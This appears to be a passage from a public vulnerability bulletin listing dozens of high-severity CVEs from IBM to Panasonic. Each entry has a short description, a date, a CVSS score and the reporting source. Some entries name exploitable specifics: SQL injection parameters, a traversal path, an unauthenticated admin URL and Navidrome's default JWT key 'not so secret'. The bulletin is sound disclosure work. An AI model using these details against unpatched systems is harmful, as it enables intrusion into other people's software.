ibm — planning_analytics IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. 2023-12-22 8 CVE-2023-42017
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view modify files on the system. IBM X-Force ID: 271196. 2023-12-20 9.1 CVE-2023-47702
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341. 2023-12-20 8.8 CVE-2023-47706
psirt@us.ibm.com
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220. 2023-12-20 7.5 CVE-2023-47704
psirt@us.ibm.com
psirt@us.ibm.com
idemia — sigma_lite_firmware The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device. 2023-12-15 9.8 CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware The handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.8 CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware During the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.8 CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware When reading DesFire keys, the function that reads the card isn’t properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key. 2023-12-15 9.8 CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it’s possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer 2023-12-15 7.5 CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imou — imou_life_app A session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks. 2023-12-19 8.1 CVE-2023-6913
cve-coordination@incibe.es
infinispan — infinispan A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration. 2023-12-18 7.2 CVE-2023-5384
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
istanbul_soft_informatics_and_consultancy_limited_company — softomi_advanced_c2c_marketplace_software Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023. 2023-12-21 9.8 CVE-2023-6145
iletisim@usom.gov.tr
itpison — omicard_edm ITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. 2023-12-15 9.8 CVE-2023-48371
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM ‘s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48372
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48373
twcert@cert.org.tw
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-41727
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46216
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46217
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46220
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46221
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46222
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46223
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46224
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46225
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46257
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46258
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46259
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46260
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46261
support@hackerone.com
ivanti — avalanche An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. 2023-12-19 9.8 CVE-2023-46263
support@hackerone.com
ivanti — avalanche An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remove code execution. 2023-12-19 9.8 CVE-2023-46264
support@hackerone.com
ivanti — avalanche An unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF). 2023-12-19 9.8 CVE-2023-46265
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS). 2023-12-19 7.5 CVE-2023-46803
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS). 2023-12-19 7.5 CVE-2023-46804
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. 2023-12-16 7.5 CVE-2023-39340
support@hackerone.com
jetbrains — teamcity In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible 2023-12-15 8.8 CVE-2023-50870
cve@jetbrains.com
kaifa — webitr_attendance_system Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information. 2023-12-15 9.8 CVE-2023-48392
twcert@cert.org.tw
kaifa_technology — webitr_attendance_system Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. 2023-12-15 8.8 CVE-2023-48394
twcert@cert.org.tw
kakadu_software_pty_ltd — kakadu_sdk JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker. 2023-12-20 7.5 CVE-2023-6562
cve-coordination@google.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49677
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49678
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49679
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49680
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49681
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDate’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49682
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49683
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49684
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTime’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49685
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49686
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtPass’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49687
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49688
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49689
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘WalkinId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49690
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘id’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5007
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursecode’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5010
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursename’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5011
help@fluidattacks.com
help@fluidattacks.com
kodcloud — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6848
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6849
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6850
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. 2023-12-16 9.8 CVE-2023-6851
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. 2023-12-16 9.8 CVE-2023-6852
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6853
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kylinsoft — hedron-domain-hook A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 7.8 CVE-2023-7025
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lfprojects — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-15 8.1 CVE-2023-6831
security@huntr.dev
security@huntr.dev
linux — kernel A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system. 2023-12-21 7.8 CVE-2023-6546
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel A heap out-of-bounds write vulnerability in the Linux kernel’s Performance Events system component can be exploited to achieve local privilege escalation. A perf_event’s read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b. 2023-12-19 7.8 CVE-2023-6931
cve-coordination@google.com
cve-coordination@google.com
linux — kernel A use-after-free vulnerability in the Linux kernel’s ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1. 2023-12-19 7.8 CVE-2023-6932
cve-coordination@google.com
cve-coordination@google.com
linux — linux_kernel A use-after-free vulnerability in the Linux kernel’s netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a. 2023-12-18 7.8 CVE-2023-6817
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
m-files_corporation — m-files_server Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords. 2023-12-20 7.5 CVE-2023-6912
security@m-files.com
majordomo — majordomo MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. 2023-12-15 9.8 CVE-2023-50917
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
master_slider — master_slider_pro Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.T his issue affects Master Slider Pro: from n/a through 3.6.5. 2023-12-20 7.1 CVE-2023-47507
audit@patchstack.com
mindsdb — mindsdb MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. 2023-12-22 9.1 CVE-2023-50731
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
misp — misp app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. 2023-12-15 9.8 CVE-2023-50918
cve@mitre.org
cve@mitre.org
mlflow — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-18 7.5 CVE-2023-6909
security@huntr.dev
security@huntr.dev
moxa — iologik_e1200_series A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. 2023-12-23 8.8 CVE-2023-5961
psirt@moxa.com
mozilla — firefox TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121. 2023-12-19 8.8 CVE-2023-6866
security@mozilla.org
security@mozilla.org
mozilla — firefox Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121. 2023-12-19 8.8 CVE-2023-6873
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox_esr/thunderbird A use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6. 2023-12-19 8.8 CVE-2023-6862
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6856
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6858
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products A use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6859
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6861
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6863
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6864
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mr-corner — amazing_little_poll Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the “lp_admin.php?adminstep=” parameter. 2023-12-20 9.8 CVE-2023-6768
cve-coordination@incibe.es
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48388
twcert@cert.org.tw
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48390
twcert@cert.org.tw
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48389
twcert@cert.org.tw
navidrome — navidrome Navidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome’s subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key “not so secret”. The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don’t protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2. 2023-12-21 8.6 CVE-2023-51442
security-advisories@github.com
security-advisories@github.com
netentsec — application_security_gateway A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6903
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
netgear — wnr2000_firmware A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. 2023-12-15 9.8 CVE-2023-50089
cve@mitre.org
cve@mitre.org
nxfilter — nxfilter A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-18 9.8 CVE-2023-6905
cna@vuldb.com
cna@vuldb.com
nxfilter — nxfilter A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-17 8.8 CVE-2023-6904
cna@vuldb.com
cna@vuldb.com
octokit — app octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. 2023-12-15 7.5 CVE-2023-50728
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openbsd — openssh In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. 2023-12-18 9.8 CVE-2023-51385
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
openimageio — openimageio A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service. 2023-12-18 7.5 CVE-2023-3430
secalert@redhat.com
nvd@nist.gov
panasonic — control_fpwin_pro Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. 2023-12-19 7.8 CVE-2023-6314
product-security@gg.jp.panasonic.com
